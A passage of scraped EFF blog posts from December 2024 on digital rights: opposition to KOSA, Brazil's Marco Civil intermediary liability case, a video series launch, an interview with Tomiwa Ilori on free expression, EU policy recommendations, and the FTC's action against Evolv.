KOSA\u2019s Scope\u00a0\nAnother of KOSA\u2019s issues has been its vague list of harms, which have remained broad enough that platforms have no clear guidance on what is likely to cross the line. This update requires that the harms of \u201cdepressive disorders and anxiety disorders\u201d have \u201cobjectively verifiable and clinically diagnosable symptoms that are related to compulsive usage.\u201d The latest text\u2019s definition of compulsive usage, however, is equally vague: \u201ca persistent and repetitive use of a covered platform that significantly impacts one or more major life activities, including socializing, sleeping, eating, learning, reading, concentrating, communicating, or working.\u201d This doesn\u2019t narrow the scope of the bill.\u00a0\n\u00a0The bill doesn\u2019t even require that the impact be a negative one.\u00a0\nIt should be noted that there is no clinical definition of \u201ccompulsive usage\u201d of online services. As in past versions of KOSA, this updated definition cobbles together a definition that sounds just medical, or just legal, enough that it appears legitimate\u2014when in fact the definition is devoid of specific legal meaning, and dangerously vague to boot.\u00a0\nHow could the persistent use of social media not significantly impact the way someone socializes or communicates? The bill doesn\u2019t even require that the impact be a negative one. Comments on an Instagram photo from a potential partner may make it hard to sleep for several nights in a row; a lengthy new YouTube video may impact someone\u2019s workday. Opening a Snapchat account might significantly impact how a teenager keeps in touch with her friends, but that doesn\u2019t mean her preference for that over text messages is \u201ccompulsive\u201d and therefore necessarily harmful.\u00a0\nNonetheless, an FTC weaponizing KOSA could still hold platforms liable for showing content to minors that they believe results in depression or anxiety, so long as they can claim the anxiety or depression disrupted someone\u2019s sleep, or even just changed how someone socializes or communicates. These so-called \u201charms\u201d could still encompass a huge swathe of entirely legal (and helpful) content about everything from abortion access and gender-affirming care to drug use, school shootings, and tackle football.\u00a0\nDangerous Censorship Bills Do Not Belong in Must-Pass Legislation\nThe latest KOSA draft comes as incoming nominee for FTC Chair, Andrew Ferguson\u2014who would be empowered to enforce the law, if passed\u2014has reportedly vowed to protect free speech by \u201cfighting back against the trans agenda,\u201d among other things. As we\u2019ve said for years (and about every version of the bill), KOSA would give the FTC under this or any future administration wide berth to decide what sort of content platforms must prevent young people from seeing. Just passing KOSA would likely result in platforms taking down protected speech and implementing age verification requirements, even if it's never enforced; the FTC could simply express the types of content they believe harms children, and use the mere threat of enforcement to force platforms to comply.\u00a0\u00a0\nNo representative should consider shoehorning this controversial and unconstitutional bill into a continuing resolution. A law that forces platforms to censor truthful online content should not be in a last minute funding bill.\nTELL CONGRESS: VOTE NO ON KOSA\nno kosa\u00a0in\u00a0last minute funding bills<\/p><\/div><\/li>
<\/span><\/a><\/div>Brazil\u2019s Internet Intermediary Liability Rules Under Trial: What Are the Risks?<\/a><\/span>
by Veridiana Alimonti<\/a> on December 11, 2024 at 2:00 pm <\/small>
The Brazilian Supreme Court is on the verge of deciding whether digital platforms can be held liable for third-party content even without a judicial order requiring removal. A panel of eleven justices is examining two cases jointly, and one of them directly challenges whether Brazil\u2019s internet intermediary liability regime for user-generated content aligns with the country\u2019s Federal Constitution or fails to meet constitutional standards. The outcome of these cases can seriously undermine important free expression and privacy safeguards if they lead to general content monitoring obligations or broadly expand notice-and-takedown mandates.\u00a0 \nThe court\u2019s examination revolves around Article 19 of Brazil\u2019s Civil Rights Framework for the Internet (\u201cMarco Civil da Internet\u201d, Law n. 12.965\/2014). The provision establishes that an internet application provider can only be held liable for third-party content if it fails to comply with a judicial order to remove the content. A notice-and-takedown exception to the provision applies in cases of copyright infringement, unauthorized disclosure of private images containing nudity or sexual activity, and content involving child sexual abuse. The first two exceptions are in Marco Civil, while the third one comes from a prior rule included in the Brazilian child protection law. \nThe decision the court takes will set a precedent for lower courts regarding two main topics:\u00a0whether Marco Civil\u2019s internet intermediary liability regime is aligned with Brazil's Constitution\u00a0and whether internet application providers have the obligation to monitor\u00a0online content they host and remove it when deemed\u00a0offensive, without judicial intervention. Moreover, it can have a regional and cross-regional impact as lawmakers and courts look across borders at platform regulation trends amid global coordination initiatives. \nAfter a public hearing held last year, the Court's sessions about the cases started in late November and, so far, only Justice Dias Toffoli, who is in charge of Marco Civil\u2019s constitutionality case, has concluded the presentation of his vote. The justice declared Article 19 unconstitutional and established the notice-and-takedown regime set in Article 21 of Marco Civil, which relates to unauthorized disclosure of private images, as the general rule for intermediary liability. According to his vote, the determination of liability must consider the activities the internet application provider\u00a0has actually carried out and the degree of interference of these activities. \nHowever, platforms could be held liable for certain content regardless of notification, leading to a monitoring duty. Examples include content\u00a0considered criminal offenses, such as\u00a0crimes\u00a0against the democratic state, human trafficking, terrorism, racism, and violence against children and women. It also includes the publication of notoriously false or severely miscontextualized facts that lead to violence or have the potential to disrupt the electoral process. If there\u2019s reasonable doubt, the notice-and-takedown rule under Marco Civil\u2019s Article 21 would be the applicable regime. \nThe court session resumes today, but it\u2019s still uncertain whether all eleven justices will reach a judgement by year\u2019s end. \u00a0 \nSome Background About Marco Civil\u2019s Intermediary Liability Regime \nThe legislative intent back in 2014 to establish Article 19 as the general rule for internet application providers' liability for user-generated content reflected civil society\u2019s concerns over platform censorship. Faced with the risk of being held liable for user content, internet platforms generally prioritize their economic interests and security over preserving\u00a0users\u2019 protected expression and over-remove content to avoid legal battles and regulatory scrutiny. The enforcement overreach of copyright rules online was already a problem when the legislative discussion of Marco Civil took place. Lawmakers chose to rely on courts to balance the different rights at stake in removing or keeping user content online. The approval of Marco Civil had wide societal support and was considered a win for advancing users\u2019 rights online. \nThe provision was in line with the Special Rapporteurs for Freedom of Expression from the United Nations and the Inter-American Commission on Human Rights (IACHR). In that regard, the then IACHR\u2019s Special Rapporteur had clearly remarked that a strict liability regime creates strong incentives for private censorship, and would run against the State\u2019s duty to favor an institutional framework that protects and guarantees free expression under the American Convention on Human Rights. Notice-and-takedown regimes as the general rule also raised concerns of over-removal and the weaponization of notification mechanisms to censor protected speech. \nA lot has happened since 2014. Big Tech platforms have consolidated their dominance, the internet ecosystem is more centralized, and algorithmic mediation of content distribution online has intensified, increasingly relying on a corporate surveillance structure. Nonetheless, the concerns Marco Civil reflects remain relevant just as the balance its intermediary liability rule\u00a0has struck persists as a proper way of tackling these concerns. Regarding current challenges, changes to the liability regime suggested in Dias Toffoli's vote will likely reinforce rather than reduce corporate surveillance, Big Tech\u2019s predominance, and digital platforms\u2019 power over online speech. \nThe Cases Under Trial and The Reach of the Supreme Court\u2019s Decision \nThe two individual cases under analysis by the Supreme Court are more than a decade old. Both relate to the right to honor. In the first one, the plaintiff, a high school teacher, sued Google Brasil Internet Ltda to remove an online community created by students to offend her\u00a0on the now defunct Orkut platform. She asked for the deletion of the community and compensation for moral damages, as the platform didn't remove the community after an extrajudicial notification. Google deleted the community following the decision of the lower court, but the judicial dispute about the compensation continued. \nIn the second case, the plaintiff sued Facebook after the company didn\u2019t remove an offensive fake account impersonating her. The lawsuit sought to shut down the fake account, obtain the identification of the account\u2019s IP address, and compensation for moral damages. As Marco Civil had already passed, the judge denied the moral compensation request. Yet, the appeals court found that Facebook could be liable for not removing the fake account after an extrajudicial notification, finding Marco Civil\u2019s intermediary liability regime unconstitutional vis-\u00e0-vis Brazil\u2019s constitutional protection to consumers.\u00a0 \nBoth cases went all the way through the Supreme Court in two separate extraordinary appeals, now examined jointly. For the Supreme Court to analyze extraordinary appeals, it must identify and approve a \u201cgeneral repercussion\u201d issue that unfolds from the individual case. As such, the topics under analysis of the Brazilian Supreme Court in these appeals are not only the individual cases, but also the court\u2019s understanding about the general repercussion issues involved. What the court stipulates in this regard will orient lower courts\u2019 decisions in similar cases.\u00a0 \nThe two general repercussion issues under scrutiny are, then, the constitutionality of Marco Civil\u2019s internet intermediary liability regime and whether internet application providers have the obligation to monitor published content and take it down when considered offensive, without judicial intervention.\u00a0 \nThere\u2019s a lot at stake for users\u2019 rights online in the outcomes of these cases.\u00a0 \nThe Many Perils and Pitfalls on the Way \nBrazil\u2019s platform regulation debate has heated up in the last few years. Concerns over the gigantic power of Big Tech platforms, the negative effects of their attention-driven business model, and revelations of plans and actions from the previous presidential administration to remain in power arbitrarily inflamed discussions of regulating Big Tech. As its main vector, draft bill 2630 (PL 2630), didn\u2019t move forward in the Brazilian Congress, the Supreme Court\u2019s pending cases gained traction as the available alternative for introducing changes.\u00a0 \nWe\u2019ve written about\u00a0intermediary liability trends\u00a0around the globe, how to move forward, and the risks that\u00a0changes in\u00a0safe harbors regimes end up reshaping intermediaries\u2019 behavior in ways that ultimately harm freedom of expression and other rights for internet users.\u00a0 \nOne of these risks is relying on strict liability regimes to moderate user expression online. Holding internet application providers liable for user-generated content regardless of a notification means requiring them to put in place systems of content monitoring and filtering with automated takedowns of potential infringing content.\u00a0 \nWhile platforms like Facebook, Instagram, X (ex-Twitter), Tik Tok, and YouTube already use AI tools to moderate and curate the sheer volume of content they receive per minute, the resources they have for doing so are not available for other, smaller internet application providers that host users\u2019 expression. Making automated content monitoring a general obligation will likely intensify the concentration of the online ecosystem in just a handful of large platforms. Strict liability regimes also inhibit or even endanger the existence of less-centralized content moderation models, contributing yet again to entrenching Big Tech\u2019s dominance and business model. \nBut the fact that Big Tech platforms already use AI tools to moderate and restrict content doesn\u2019t mean they do it well. Automated content monitoring is hard at scale and platforms constantly fail at purging content that violates its rules without sweeping up protected content. In addition to historical issues with AI-based detection of copyright infringement that have deeply undermined fair use rules, automated systems often flag and censor crucial information that should stay online. \u00a0 \nJust to give a few examples, during the wave of protests in Chile, internet platforms wrongfully restricted content reporting police's harsh repression of demonstrations, having deemed it violent content. In Brazil, we saw similar concerns when Instagram censored images of Jacarezinho\u2019s community\u2019s massacre in 2021, which was the most lethal police operation in Rio de Janeiro\u2019s history. In other geographies, the quest to restrict extremist content has removed videos documenting human rights violations in conflicts in countries like Syria and Ukraine. \nThese are all examples of content similar to what could fit into Justice Toffoli\u2019s list of speech subject to a strict liability regime. And while this regime shouldn\u2019t apply in cases of reasonable doubt, platform companies won\u2019t likely risk keeping such content up out of concern that a judge decides later that it wasn\u2019t a reasonable doubt situation and orders them to pay damages. \u00a0Digital platforms have, then, a strong incentive to calibrate their AI systems to err on the side of censorship. And depending on how these systems operate, it means a strong incentive for conducting prior censorship potentially affecting protected expression, which defies Article 13 of the American Convention. \u00a0 \nSetting the notice-and-takedown regime as the general rule for an intermediary\u2019s liability also poses risks. While the company has the chance to analyze and decide whether to keep content online, again the incentive is to err on the side of taking it down to avoid\u00a0legal costs. \nBrazil's own experience in courts shows how tricky the issue can be. InternetLab's research based on rulings involving free expression online indicated that Brazilian courts of appeals denied content removal requests in more than 60% of cases. The Brazilian Association of Investigative Journalism (ABRAJI) has also highlighted data showing that at some point in judicial proceedings, judges agreed with content removal requests in around half of the cases, and some were reversed later on. This is especially concerning in honor-related cases. The more influential or powerful the person involved, the higher the chances of arbitrary content removal, flipping the public-interest logic of preserving access to information. We should not forget companies that thrived by offering reputation management services built upon the use of takedown mechanisms to disappear critical content online. \nIt's important to underline that this ruling comes in the absence of digital procedural justice guarantees. While Justice Toffoli\u2019s vote asserts platforms\u2019 duty to provide specific notification channels, preferably electronic, to receive complaints about infringing content, there are no further specifications to avoid the misuse of notification systems. Article 21 of Marco Civil sets that notices must allow the specific identification of the contested content (generally understood as the URL) and elements to verify that the complainant is the person offended. Except for that, there is no further guidance on which details and justifications the notice should contain, and whether the content\u2019s author would have the opportunity, and the proper mechanism, to respond or appeal to the takedown request.\u00a0 \nAs we said before, we should not mix platform accountability with reinforcing digital platforms as points of control over people's online expression and actions. This is a dangerous path considering the power big platforms already have and the increasing intermediation of digital technologies in everything we do. Unfortunately, the Supreme Court seems to be taking a direction that will emphasize such a role and dominant position, creating also additional hurdles for smaller platforms and decentralized models to compete with the current digital giants.\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>Introducing EFF\u2019s New Video Series: Gate Crashing<\/a><\/span>
by Katharine Trendacosta<\/a> on December 10, 2024 at 7:56 pm <\/small>
The promise of the internet\u2014at least in the early days\u2014was that it would lower the barriers to entry for any number of careers. Traditionally, the spheres of novel writing, culture criticism, and journalism were populated by well-off straight white men, with anyone not meeting one of those criteria being an outlier. Add in giant corporations acting as gatekeepers to those spheres and it was a very homogenous culture. The internet has changed that.\u00a0There is a lot about the internet that needs fixing, but the one thing we should preserve and nurture is the nontraditional paths to success it creates. In this series of interviews, called \u201cGate Crashing,\u201d we look to highlight those people and learn from their examples. In an ideal world, lawmakers will be guided by lived experiences like these when thinking about new internet legislation or policy.\u00a0In our first video, we look at creators who honed their media criticism skills in fandom spaces. Please join Gavia Baker-Whitelaw and Elizabeth Minkel, co-creators of the Rec Center newsletter, in a wide-ranging discussion about how they got started, where it has led them, and what they\u2019ve learned about internet culture and policy along the way.\u00a0\n \n\n \n %3Ciframe%20title%3D%22YouTube%20video%20player%22%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fembed%2FaeplIxvskx8%3Fsi%3DJJtXxSdTkjYiTrTT%26autoplay%3D1%26mute%3D1%22%20width%3D%22560%22%20height%3D%22315%22%20frameborder%3D%220%22%20allowfullscreen%3D%22allowfullscreen%22%20allow%3D%22autoplay%22%3E%3C%2Fiframe%3E\n \n \n Privacy info.\n This embed will serve content from youtube.com<\/p><\/div><\/li>
<\/span><\/a><\/div>Speaking Freely: Tomiwa Ilori<\/a><\/span>
by David Greene<\/a> on December 10, 2024 at 6:40 pm <\/small>
Interviewer: David Greene\nThis interview has been edited for length and clarity.\nTomiwa Ilori is an expert researcher and a policy analyst with focus on digital technologies and human rights. Currently, he is an advisor for the B-Tech Africa Project at UN Human Rights and\u00a0 a Senior ICFP Fellow at HURIDOCS.\u00a0 His postgraduate qualifications include masters and doctorate degrees from the Centre for Human Rights, Faculty of Law, University of Pretoria. All views and opinions expressed in this interview are personal.\u00a0\nGreene: Why don\u2019t you start by introducing yourself?\nTomiwa Ilori: My name is Tomiwa Ilori. I\u2019m a legal consultant with expertise in digital rights and policy. I work with a lot of organizations on digital rights and policy including information rights, business and human rights, platform governance, surveillance studies, data protection and other aspects.\u00a0\nGreene: Can you tell us more about the B-Tech project?\u00a0\nThe B-Tech project is a project by the UN human rights office and the idea behind it is to mainstream the UN Guiding Principles on Business and Human Rights (UNGPs) into the tech sector. The project looks at, for example, how\u00a0 social media platforms can apply human rights due diligence frameworks or processes to their products and services more effectively. We also work on topical issues such as Generative AI and its impacts on human rights. For example, how do the UNGPs apply to Generative AI? What guidance can the UNGPs provide for the regulation of Generative AI and what can actors and policymakers look for when regulating Generative AI and other new and emerging technologies?\u00a0\nGreene: Great. This series is about freedom of expression. So my first question for you is what does freedom of expression mean to you personally?\u00a0\nI think freedom of expression is like oxygen, more or less like the air we breathe. There is nothing about being human that doesn\u2019t involve expression, just like drawing breath. Even beyond just being a right, it\u2019s an intrinsic part of being human. It\u2019s embedded in us from the start. You have this natural urge to want to express yourself right from being an infant. So beyond being a human right, it is something you can almost not do without in every facet of life. Just to put it as simply as possible, that\u2019s what it means to me.\u00a0\nGreene: Is there a single experience or several experiences that shaped your views about freedom of expression?\u00a0\nYes. For context, I\u2019m Nigerian and I also grew up in the Southwestern part of the country where most of the Yor\u00f9b\u00e1 people live. As a Yoruba person and as someone who grew up listening and speaking the Yoruba language, language has a huge influence on me, my philosophy and my ideas. I have a mother who loves to speak in proverbs and mostly in Yor\u00f9b\u00e1. Most of these proverbs which are usually profound show that free speech is the cornerstone of being human, being part of a community, and exercising your right to life and existence. Sharing expression and growing up in that kind of community shaped my worldview about my right to be. Closely attached to my right to be is my right to express myself. More importantly, it also shaped my view about how my right to be does not necessarily interrupt someone else\u2019s right to be. So, yes, my background and how I grew up really shaped me. Then, I was fortunate that I also grew up and furthered my studies. My graduate studies including my doctorate focused on freedom of expression. So I got both the legal and traditional background grounded in free speech studies and practices in unique and diverse ways.\u00a0\nGreene: Can you talk more about whether there is something about \u00a0Yor\u00f9b\u00e1 language or culture that is uniquely supportive of freedom of expression?\u00a0\nThere\u2019s a proverb that goes, \u201cA k\u00ec\u00ed pa oh\u00f9n m\u1ecd agogo l\u1eb9\u0301nu\u201d and what that means in a loose English translation is that you cannot shut the clapperless bell up, it is the bell\u2019s right to speak, to make a sound. So you have no right to stop a bell from doing what it\u2019s meant to do, it suggests that it is everyone\u2019s right to express themselves. It suffices to say that according to that proverb, you have no right to stop people from expressing themselves. There\u2019s another proverb that is a bit similar which is,\u201c\u1eccm\u1ecdd\u00e9 gb\u1ecd\u0301n, \u00e0gb\u00e0 gb\u1ecd\u0301n, laf\u00ed d\u00e1 \u00f3t\u00f9 If\u1eb9\u0300\u201d which when loosely translated refers to how both the old and the young collaborate to make the most of a society by expressing their wisdom.\u00a0\nGreene: Have you ever had a personal experience with censorship?\u00a0\nYes and I will talk about two experiences. First, and this might not fit the technical definition of censorship, but there was a time when I lived in Kampala and I had to pay tax to access the internet which I think is prohibitive for those who are unable to pay it. If people have to make a choice between buying bread to eat and paying a tax to access the internet, especially when one item is an opportunity cost for the other, it makes sense that someone would choose bread over paying that tax. So you could say it\u2019s a way of censoring internet users. When you make access prohibitive through taxation, it is also a way of censoring people. Even though I was able to pay the tax, I could not stop thinking about those who were unable to afford it and for me that is problematic and qualifies as a kind of censorship.\u00a0\nAnother one was actually very recent. Even though the internet service provider insisted that they did not shut down or throttle the internet,, I remember that during the recent protests in Nairobi, Kenya in June of 2024, I experienced an internet shutdown for the first time. According to the internet service provider, the shut down was as a result of an undersea cable cut. Suddenly my emails just stopped working and my Twitter (now X) feed won\u2019t load. The connection appeared to work for a few seconds, and then all of a sudden it would stop, then work for some time, then all of a sudden nothing. I felt incapacitated and helpless. That\u2019s the way I would describe it. I felt like, \u201cWow, I have written, thought, spoken about this so many times and this is it.\u201d For the first time I understood what it means to actually experience an internet shutdown and it\u2019s not just the experience, it\u2019s the helplessness that comes with it too.\u00a0\nGreene: Do you think there is ever a time when the government can justify an internet shutdown?\u00a0\nThe simple answer is no. In my view, those who carry out internet shutdowns, especially state actors, believe that since freedom of expression and some other associated rights are not absolute, they have every right to restrict them without measure. I think what many actors that are involved in internet shutdowns use as justification is a mask for their limited capacity to do the right thing. Actors involved in shutting down the internet say that they usually do not have a choice. For example, they say that hate speech, misinformation, and online violence are being spread online in such a way that it could spill over into offline violence. Some have even gone as far as saying that they\u2019re shutting down the internet because they want to curtail examination fraud. When these are the kind of excuses used by actors, it demonstrates the limited understanding of actors on what international human rights standards prescribe and what can actually be done to address the online harms that are used to justify internet shutdowns.\u00a0\nLet me use an example: international human rights standards provide clear processes for instances where state actors must address online harms or where private actors must address harms to forestall offline violence. The perception is that these standards do not even give room for addressing harms, which is not the case. The process requires that whatever action you take must be legal i.e. be provided clearly in a law, must not be vague, must be unequivocal and show in detail the nature of the right that is limited. Another requirement says that whatever action to be taken to limit a right must be proportional. If you are trying to fight hate speech online, don\u2019t you think it is disproportionate to shut down the entire network just to fight one section of people spreading such speech? Another requirement is that its necessity must be justified i.e. to protect clearly defined public interest or order which must be specific and not the blanket term \u2018national security.\u2019 Additionally international human rights law is clear that these requirements must be cumulative i.e. you can not fulfill the requirement of legality and not fulfill that of proportionality or necessity.\u00a0\nThis shows that when trying to regulate online harms, it needs to be very specific. So, for example, state actors can actually claim that a particular content or speech is causing harm which the state actors must prove according to the requirements above. You can make a request such that just that content alone is restricted. Also these must be put in context. Using hate speech as an example. There\u2019s the RabatAction Plan on Hate Speech which was developed by the UN, and it\u2019s very clear on the conditions that must be met before the speech can be categorized as hate speech. So are these conditions met by state actors before, for example, they ask platforms to remove particular hate content? There are steps and processes involved\u00a0 in the regulation of problematic content, but state actors never go simply for targeted removal that comply with international human rights standards, they usually go for the entire network.\u00a0\nI\u2019d also like to add that I find it problematic and ironic that most state actors who are supposedly champions of digital transformation are also the ones quick to shut down the internet during political events. There is no digital transformation that does not include a free, accessible and interoperable internet. These are some of the challenges and problematic issues that I think we need to address in more detail so we can hear each other better, especially when it comes to regulating online speech and fighting internet shutdowns.\u00a0\nGreene: So shutdowns are then inherently disproportionate and not authorized by law. You talked about the types of speech that might be limited. Can you give us a sense of what types of online speech you think might be appropriately regulated by governments?\u00a0\nFor categories of speech that can be regulated, of course, that includes hate speech. It\u2019s under international law as provided for underArticle 20 of the International Covenant on Civil and Political Rights (ICCPR) prohibits propagation of war, etc. The International Convention on the Elimination of All Forms of Racial Discrimination (ICERD) also provides for this. However, these applicable provisions are not carte blanche for state actors. The major conditions that must be met before avspeech qualifies as hate speech must be fulfilled before it can be regarded as one. This is done in order to address instances where powerful actors define what constitutes hate speech and violate human rights under the guise of combating it. There are still laws that criminalize disaffection against the state which are used to prosecute dissent.\u00a0\nGreene: In Nigeria or in Kenya or just on the continent in general?\u00a0\nYes, there are countries that still have l\u00e8se-majest\u00e9 laws in criminal laws and penal codes. We\u2019ve had countries like Nigeria that were\u00a0 trying to come up with a version of such laws for the online space, but which have been fought down by mostly civil society actors.\u00a0\nSo hate speech does qualify as speech that could be limited, but with caveats. There are several conditions that must be made before speech qualifies as hate speech. There must be context around the speech. For example, what kind of power does the person who makes the speech wield? What is the likelihood of that speech leading to violence? What audience has the speech been made to? These are some of the criteria that must be fulfilled before you say, \u201cokay, this qualifies as hate speech.\u201d\u00a0\nThere\u2019s also other clearly problematic content, child sexual abuse material for example, that are prima facie illegal and must be censored or removed or disallowed. That goes without saying. It\u2019s customary international human rights law especially as it applies to platform governance. Another category of speech could also be non-consensual sharing of intimate images which could qualify as online gender-based violence. So these are some of the categories that could come under regulation by states.\u00a0\nI also must sound a note that there are contexts to applying speech laws. It is also the reason why speech laws are one of the most difficult regulations to come up with because they are usually context-dependent especially when they are to be balanced against international human rights standards. Of course, some of the biggest fears in platform\u00a0 regulation that touch on freedom of expression is how state actors could weaponize those laws to track or to attack dissent and how businesses platform speech mainly for profit.\u00a0\nGreene: Is misinformation something the government should have a role in regulating or is that something that needs to be regulated by the companies or by the speakers? If it\u2019s something we need to worry about, who has a role in regulating it?\u00a0\nState actors have a role. But in my opinion I don\u2019t think it\u2019s regulation. The fact that you have a hammer does not mean that everything must look like a nail. The fact that a state actor has the power to make laws does not mean that it must always make laws on all social problems. I believe non-legal and multi-stakeholder solutions are required for combatting online harms. State actors have tried to do what they do best by coming up with laws that regulate misinformation. But where has that led us? The arrest and harassment of journalists, human rights defenders and activists. So it has really not solved any problems.\u00a0\nWhen your approach is not solving any problems, I think it\u2019s only right to re-evaluate. That\u2019s the reason I said state actors have a role. In my view, state actors need to step back in a sense that you don\u2019t necessarily need to leave the scene, but step back and allow for a more holistic dialogue among stakeholders involved in the information ecosystem. You could achieve a whole lot more through digital literacy and skills than you will with criminalizing misinformation. You can do way more by supporting journalists with fact-checking skills than you will ever achieve by passing overbroad laws that limit access to information. You can do more by working with stakeholders in the information ecosystem like platforms to label problematic content than you will ever by shutting down the internet. These are some of the non-legal methods that could be used to combat misinformation and actually get results. So, state actors have a role, but it is mainly facilitatory in the sense that it should bring stakeholders together to brainstorm on what the contexts are and the kinds of useful solutions that could be applied effectively.\u00a0\nGreene: What do you feel the role of the companies should be?\u00a0\nCompanies also have an important role, one of which is to respect human rights in the course of providing services. What I always say for technology companies is that, if a certain jurisdiction or context is good enough to make money from, it is good enough to pay attention to and respect human rights there.\nOne of the perennial issues that platforms face in addressing online harms is aligning their community standards with international human rights standards. But oftentimes what happens is that corporate-speak is louder than the human rights language in many of these standards.\u00a0\nThat said, some of the practical things that platforms could do is to step out of the corporate talk of, \u201cOh, we\u2019re companies, there\u2019s not much we can do.\u201d There\u2019s a lot they can do. Companies need to get more involved, step into the arena and walk with key state actors, including civil society, to\u00a0 educate and develop capacity on how their\u00a0 platforms actually work. For example, what are the processes involved, for example, in taking down a piece of content? What are the processes involved in getting appeals? What are the processes involved in actually getting redress when a piece of content has been wrongly taken down? What are the ways platforms can accurately\u2014and I say accurately emphatically because I\u2019m not speaking about using automated tools\u2014label content? Platforms also have responsibilities in being totally invested in the contexts they do business in. What are the triggers for misinformation in a particular country? Elections, conflict, protests? These are like early warning sign systems that platforms need to start paying attention to to be able to understand their contexts and be able to address the harms on their platforms better.\u00a0\nGreene: What\u2019s the most pressing free speech issue in the region in which you work?\u00a0\nWell, for me, I think of a few key issues. Number one, which has been going on for the longest time, is the government\u2019s use of laws to stifle free speech. Most of the laws that are used are cybercrime laws, electronic communication laws, and old press codes and criminal codes. They were never justified and they\u2019re still not justified.\u00a0\nA second issue is the privatization of speech by companies regarding the kind of speech that gets promoted or demoted. What are the guidelines on, for example, political advertisements? What are the guidelines on targeted advertisement? How are people\u2019s data curated? What is it like in the algorithm black box? Platforms\u2019 roles on who says what, how,\u00a0 when and where also is a burning free speech issue. And we are moving towards a future where speech is being commodified and privatized. Public media, for example, are now being relegated to the background. Everyone wants to be on social media and I\u2019m not saying that\u2019s a terrible thing, but it gives us a lot to think about, a lot to chew on.\u00a0\nGreene: And finally, who is your free speech hero?\u00a0\nHis name is Fel\u00e1 An\u00edk\u00fal\u00e1p\u00f3 K\u00fat\u00ec. Fela was a political musician and the originator of Afrobeat not afrobeats with an \u201cs\u201d but the original Afrobeat which that one came from. Fela never started out as a political musician, but his music became highly political and highly popular among the people for obvious reasons. His music also became timely because, as a political musician in Nigeria who lived during the brutal military era, it resonated with a lot of people. He was a huge thorn in the flesh of despotic Nigerian and African leaders. So, for me, Fela is my free speech hero. He said quite a lot with his music that many people in his generation would never dare to say because of the political climate at that time. Taking such risks even in the face of brazen violence and even death was remarkable.\nFela was not just a political musician who understood the power of expression. He was also someone who understood the power of visual expression. He\u2019s unique in his own way and expresses himself through music, through his lyrics. He\u2019s someone who has inspired a lot of people including musicians, politicians and a lot of new generation activists.<\/p><\/div><\/li>
<\/span><\/a><\/div>A Fundamental-Rights Centered EU Digital Policy: EFF\u2019s Recommendations 2024-2029<\/a><\/span>
by Christoph Schmon<\/a> on December 10, 2024 at 5:22 pm <\/small>
The European Union (EU) is a hotbed for tech regulation that often has ramifications for users globally. \u00a0The focus of our work in Europe is to ensure that EU tech policy is made responsibly and lives up to its potential to protect users everywhere.\u00a0\nAs the new mandate of the European institution begins \u2013 a period where newly elected policymakers set legislative priorities for the coming years \u2013 EFF today published recommendations for a European tech policy agenda that centers on fundamental rights, empowers users, and fosters fair competition. These principles will guide our work in the EU over the next five years. Building on our previous work and success in the EU, we will continue to advocate for users and work to ensure that technology supports freedom, justice, and innovation for all people of the world.\u00a0\nOur policy recommendations cover social media platform intermediary liability, competition and interoperability, consumer protection, privacy and surveillance, and AI regulation. Here\u2019s a sneak peek:\u00a0\u00a0\n\nThe EU must ensure that the enforcement of platform regulation laws like the Digital Services Act and the European Media Freedom Act are centered on the fundamental rights of users in the EU and beyond.\nThe EU must create conditions of fair digital markets that foster choice innovation and fundamental rights. Achieving this requires enforcing the user-rights centered provisions of the Digital Markets Act, promoting app store freedom, user choice, and interoperability, and countering AI monopolies.\u00a0\nThe EU must adopt a privacy-first approach to fighting online harms like targeted ads and deceptive design and protect children online without reverting to harmful age verification methods that undermine the fundamental rights of all users.\u00a0\nThe EU must protect users\u2019 rights to secure, encrypted, and private communication, protect against surveillance everywhere, stay clear of new data retention mandates, and prioritize the rights-respecting enforcement of the AI Act.\u00a0\n\nRead on for our full set of recommendations.<\/p><\/div><\/li>
<\/span><\/a><\/div>FTC Rightfully Acts Against So-Called \u201cAI Weapon Detection\u201d Company Evolv<\/a><\/span>
by Matthew Guariglia<\/a> on December 6, 2024 at 8:20 pm <\/small>
The Federal Trade Commission has entered a settlement with self-styled \u201cweapon detection\u201d company Evolv, to resolve the FTC\u2019s claim that the company \u201cknowingly\u201d and repeatedly\u201d engaged in \u201cunlawful\u201d acts of misleading claims about their technology. Essentially, Evolv\u2019s technology, which is in schools, subways, and stadiums, does far less than they\u2019ve been claiming.\u00a0\n\nThe FTC alleged in their complaint that despite the lofty claims made by Evolv, the technology is fundamentally no different from a metal detector: \u201cThe company has insisted publicly and repeatedly that Express is a \u2018weapons detection\u2019 system and not a \u2018metal detector.\u2019 This representation is solely a marketing distinction, in that the only things that Express scanners detect are metallic and its alarms can be set off by metallic objects that are not weapons.\u201d A typical contract for Evolv costs tens of thousands of dollars per year\u2014five times the cost of traditional metal detectors. One district in Kentucky spent $17 million to outfit its schools with the software.\u00a0\n\nThe settlement requires notice, to the many schools which use this technology to keep weapons out of classrooms, that they are allowed to cancel their contracts. It also blocks the company from making any representations about their technology\u2019s:\n\n\nability to detect weapons\nability to ignore harmless personal items\nability to detect weapons while ignoring harmless personal items\nability to ignore harmless personal items without requiring visitors to remove any such items from pockets or bags\n\n\nThe company also is prohibited from making statements regarding:\u00a0\n\nWeapons detection accuracy, including in comparison to the use of metal detectors\nFalse alarm rates, including comparisons to the use of metal detectors\nThe speed at which visitors can be screened, as compared to the use of metal detectors\nLabor costs, including comparisons to the use of metal detectors\u00a0\nTesting, or the results of any testing\nAny material aspect of its performance, efficacy, nature, or central characteristics, including, but not limited to, the use of algorithms, artificial intelligence, or other automated systems or tools.\n\n\nIf the company can\u2019t say these things anymore\u2026then what do they even have left to sell?\u00a0\n\nThere\u2019s a reason so many people accuse artificial intelligence of being \u201csnake oil.\u201d Time and again, a company takes public data in order to power \u201cAI\u201d surveillance, only for taxpayers to learn it does no such thing. \u201cJust walk out\u201d stores actually required people watching you on camera to determine what you purchased. Gunshot detection software that relies on a combination of artificial intelligence and human \u201cacoustic experts\u201d to purportedly identify and locate gunshots \u201crarely produces evidence of a gun-related crime.\u201d There\u2019s a lot of well-justified suspicion about what\u2019s really going on within the black box of corporate secrecy in which artificial intelligence so often operates.\u00a0\n\nEven when artificial intelligence used by the government isn\u2019t \u201csnake oil,\u201d it often does more harm than good. AI systems can introduce or exacerbate harmful biases that have massive\u00a0 negative impacts on people\u2019s lives. AI systems have been implicated with falsely accusing people of welfare fraud, increasing racial bias in jail sentencing as well as policing and crime prediction, and falsely identifying people as suspects based on facial recognition.\u00a0\u00a0\u00a0\n\nNow, the politicians, schools, police departments, and private venues have been duped again. This time, by Evolv, a company which purports to 